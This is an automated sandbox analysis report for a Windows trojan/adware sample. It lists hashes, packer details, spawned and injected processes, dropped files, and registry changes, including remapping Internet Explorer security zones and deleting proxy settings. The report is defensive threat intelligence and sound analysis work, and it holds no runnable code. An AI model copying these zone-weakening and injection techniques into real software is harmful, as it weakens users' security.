Adware.Agent.QCF (B) (Emsisoft), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: eb4a1216ea797f8bde4485f7b0580c8e
SHA1: 6a713ff3bdcdc151795c1e78fc49b0e6f5e0bcf9
SHA256: 007c79d7b1b904520a21d541ddccddb90fe37d2eef4a767512b3273372f98ad8
SSDeep: 49152:bbW/0oVqkt1lJcWbZdlIeKt3mFz6zBEd6uIcc:bbW/tEWFLolEd6uxc
Size: 2165862 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-06-10 18:00:27
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
msconfig.exe:656
%original file name%.exe:228
irsetup.exe:188
irsetup.exe:1668
chromeupdate.exe:1820
The Trojan injects its code into the following process(es):
MediaPlayer__15159_il35679.exe:1884
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process MediaPlayer__15159_il35679.exe:1884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\left_image[1].png (2936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\accept[1].gif (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\main[1].css (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MediaPlayer__15159_il35679.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\finish[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\cancel[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\next[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\amipb[1].js (29301 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\index[1].htm (8841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\footer_img[1].png (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\cancel1[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\decline[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\skip[1].gif (1 bytes)
%Documents and Settings%\%current user%\Desktop\Continue installation .lnk (898 bytes)
The process %original file name%.exe:228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7386 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (0 bytes)
The process irsetup.exe:188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\chromeupdate.exe (1351514 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\getthefile.txt (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRW1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRW2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)
The process irsetup.exe:1668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (16 bytes)
%Program Files%\Your Product\lua5.1.dll (2902 bytes)
%Program Files%\Your Product\Uninstall\IRIMG1.JPG (2 bytes)
%Program Files%\Your Product\Uninstall\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MediaPlayer__15159_il35679.exe (12280 bytes)
%Program Files%\Your Product\Uninstall\uni3.tmp (9317 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1209 bytes)
%Program Files%\Your Product\Uninstall\uninstall.xml (3475 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\DivXInstaller.exe (11824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
%Program Files%\Your Product\uninstall.exe (9213 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\MediaPlayer__15159_il35679.enc (7496 bytes)
%Program Files%\Your Product\Uninstall\uninstall.dat (2104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\msconfig.exe (16 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (0 bytes)
%Program Files%\Your Product\Uninstall\uni3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (0 bytes)
The process chromeupdate.exe:1820 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1610 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7972 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (0 bytes)
Registry activity
The process msconfig.exe:656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 27 9F F6 F6 93 CA 7A D9 D9 71 4D D7 FB 8A 67"
[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"
The process MediaPlayer__15159_il35679.exe:1884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\Version]
"(Default)" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0\FLAGS]
"(Default)" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCR\cousins.epoxied.1]
"(Default)" = "Inst Class"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCR\cousins.epoxied.1\CLSID]
"(Default)" = "{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}"
[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\VersionIndependentProgID]
"(Default)" = "cousins.epoxied"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKCR\cousins.epoxied]
"(Default)" = "Inst Class"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\TypeLib]
"(Default)" = "{0fa5e38b-eb27-4a51-aa61-a0baf2bfc090}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCR\cousins.epoxied\CurVer]
"(Default)" = "cousins.epoxied.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\MediaPlayer__15159_il35679\DEBUG]
"Trace Level" = ""
[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}]
"(Default)" = "IBoot"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1449692446"
[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"
[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A EE 8F 0A 84 D8 F6 46 51 DB B6 5D E1 92 43 BF"
[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\TypeLib]
"(Default)" = "{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "MediaPlayer__15159_il35679.exe"
[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\ProgID]
"(Default)" = "cousins.epoxied.1"
[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0]
"(Default)" = "InstallerLib"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}]
"(Default)" = "Inst Class"
[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\MediaPlayer__15159_il35679\DEBUG]
"Trace Level"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
The process %original file name%.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 24 A9 41 8C B4 D6 53 9D DA A4 48 EF A1 7A CC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0]
"irsetup.exe" = "Setup Application"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process irsetup.exe:188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 61 5A FB E4 3A A8 3F 65 D9 1D 76 7D 33 AD 77"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process irsetup.exe:1668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"HelpLink" = "http://www.yourcompany.com"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"DisplayIcon" = "%Program Files%\Your Product\uninstall.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
